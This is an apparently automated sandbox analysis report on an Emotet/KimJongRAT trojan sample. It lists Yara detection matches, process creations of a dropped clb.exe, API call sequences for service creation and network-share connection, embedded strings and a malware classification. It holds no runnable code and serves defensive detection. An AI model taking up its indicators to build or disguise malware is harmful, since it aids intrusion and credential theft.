                  Source: svchost.exe, 00000011.00000002.1540327406.0000023AE4E70000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                  Source: svchost.exe, 00000011.00000002.1540327406.0000023AE4E70000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                  Source: svchost.exe, 00000011.00000002.1540390673.0000023AE4E81000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                  Source: clb.exe, 00000008.00000002.1359311931.000000000019C000.00000004.00000010.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: clb.exe, clb.exe, 00000009.00000001.1356974391.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: clb.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: svchost.exe, 00000011.00000003.1535704180.0000023AE575D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.1535761325.0000023AE575D000.00000004.00000001.sdmpString found in binary or memory: https://picsart.com/privacy-policy?hl=en
                  Source: svchost.exe, 00000011.00000002.1540327406.0000023AE4E70000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                  Source: clb.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_0040FDCB OpenClipboard,GetLastError,DeleteFileW,8_2_0040FDCB

                  E-Banking Fraud:

                  barindex
                  Emotet Banking Trojan foundShow sources
                  Source: unknownProcess created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\75A2.tmp'
                  Source: unknownProcess created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\78FF.tmp'
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\75A2.tmp'Jump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeProcess created: C:\Windows\SysWOW64\webservices\clb.exe 'C:\Windows\SysWOW64\webservices\clb.exe' /scomma 'C:\Users\user\AppData\Local\Temp\78FF.tmp'Jump to behavior
                  Yara detected EmotetShow sources
                  Source: Yara matchFile source: 00000001.00000002.1540176846.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1544362683.0000000003AB0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000003.1354873351.0000000003634000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1544062855.0000000003410000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1543973117.00000000031E0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1273574338.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1273587851.0000000000AB1000.00000020.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000003.1350179735.0000000002869000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1540221883.0000000000AB1000.00000020.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 1.2.clb.exe.31e0000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.clb.exe.3ab0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.clb.exe.31e0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.clb.exe.3ab0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.clb.exe.3410000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.clb.exe.3410000.4.unpack, type: UNPACKEDPE

                  System Summary:

                  barindex
                  Malicious sample detected (through community Yara rule)Show sources
                  Source: 00000009.00000001.1356974391.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 00000001.00000003.1361807741.0000000002DB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 00000009.00000002.1357591368.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 9.1.clb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 9.2.clb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 9.1.clb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 1.3.clb.exe.2db0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: 9.2.clb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification,8_2_0040A5A9
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_1_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification,8_1_0040A5A9
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeFile created: C:\Windows\SysWOW64\webservices\Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeFile deleted: C:\Windows\SysWOW64\webservices\clb.exe:Zone.IdentifierJump to behavior
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 7_2_004038A57_2_004038A5
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 7_2_004094707_2_00409470
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 7_2_004010B47_2_004010B4
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 7_2_0040C0BC7_2_0040C0BC
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 7_2_004099E27_2_004099E2
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 7_2_0040B1F77_2_0040B1F7
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 7_2_0040123E7_2_0040123E
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 7_2_004083257_2_00408325
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 7_1_004038A57_1_004038A5
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 7_1_004094707_1_00409470
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 7_1_004010B47_1_004010B4
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 7_1_0040C0BC7_1_0040C0BC
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 7_1_004099E27_1_004099E2
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 7_1_0040B1F77_1_0040B1F7
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 7_1_0040123E7_1_0040123E
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 7_1_004083257_1_00408325
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_004360CE8_2_004360CE
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_0040509C8_2_0040509C
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_004051998_2_00405199
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_0043C2D08_2_0043C2D0
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_004404068_2_00440406
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_0040451D8_2_0040451D
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_004045FF8_2_004045FF
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_0040458E8_2_0040458E
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_004046908_2_00404690
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_00414A518_2_00414A51
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_00404C088_2_00404C08
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_00406C8E8_2_00406C8E
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_00415DF38_2_00415DF3
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_00416E5C8_2_00416E5C
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_00410FE48_2_00410FE4
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_1_004360CE8_1_004360CE
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_1_0040509C8_1_0040509C
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_1_004051998_1_00405199
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_1_0043C2D08_1_0043C2D0
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_1_004404068_1_00440406
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_1_0040451D8_1_0040451D
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_1_004045FF8_1_004045FF
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_1_0040458E8_1_0040458E
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_1_004046908_1_00404690
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_1_00414A518_1_00414A51
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_1_00404C088_1_00404C08
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 9_2_00404DE59_2_00404DE5
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 9_2_00404E569_2_00404E56
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 9_2_00404EC79_2_00404EC7
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 9_2_00404F589_2_00404F58
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 9_2_0040BF6B9_2_0040BF6B
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 9_1_00404DE59_1_00404DE5
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 9_1_00404E569_1_00404E56
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 9_1_00404EC79_1_00404EC7
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 9_1_00404F589_1_00404F58
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 9_1_0040BF6B9_1_0040BF6B
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: String function: 00404880 appears 40 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: String function: 00445190 appears 69 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: String function: 00416849 appears 117 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: String function: 00412360 appears 36 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: String function: 00444C5E appears 34 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: String function: 004053C5 appears 34 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: String function: 0040924D appears 56 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: String function: 00444C70 appears 39 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: String function: 00412084 appears 78 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: String function: 00411FF2 appears 36 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: String function: 00412072 appears 32 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: String function: 004166E8 appears 64 times
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: String function: 00416A91 appears 170 times
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: clboe.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: clboe.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: clboe.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe, 00000000.00000000.1271339987.000000000040E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTabDrives.EXEL vs SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe, 00000000.00000002.1274221512.0000000002D20000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe, 00000000.00000002.1274361810.0000000002E20000.00000002.00000001.sdmpBinary or memory string: originalfilename vs SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe, 00000000.00000002.1274361810.0000000002E20000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe
                  Source: SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exeBinary or memory string: OriginalFilenameTabDrives.EXEL vs SecuriteInfo.com.Trojan.DownLoader34.14035.15501.exe
                  Source: 00000009.00000001.1356974391.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 00000001.00000003.1361807741.0000000002DB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 00000009.00000002.1357591368.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 9.1.clb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 9.2.clb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 9.1.clb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 1.3.clb.exe.2db0000.5.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: 9.2.clb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                  Source: classification engineClassification label: mal100.phis.bank.troj.spyw.evad.winEXE@16/2@0/3
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_004183B8 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,8_2_004183B8
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: 8_2_00418842 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,8_2_00418842
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,RtlAllocateHeap,WaitForSingleObject,GetProcessHeap,HeapFree,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_3_02DB33F0
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,RtlAllocateHeap,WaitForSingleObject,GetProcessHeap,HeapFree,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_3_02DB33F0
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,RtlAllocateHeap,WaitForSingleObject,GetProcessHeap,HeapFree,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_3_02DB33F0
                  Source: C:\Windows\SysWOW64\webservices\clb.exeCode function: _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,RtlAllocateHeap,WaitForSingleObject,GetProcessHeap,HeapFree,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_3_02DB33F0
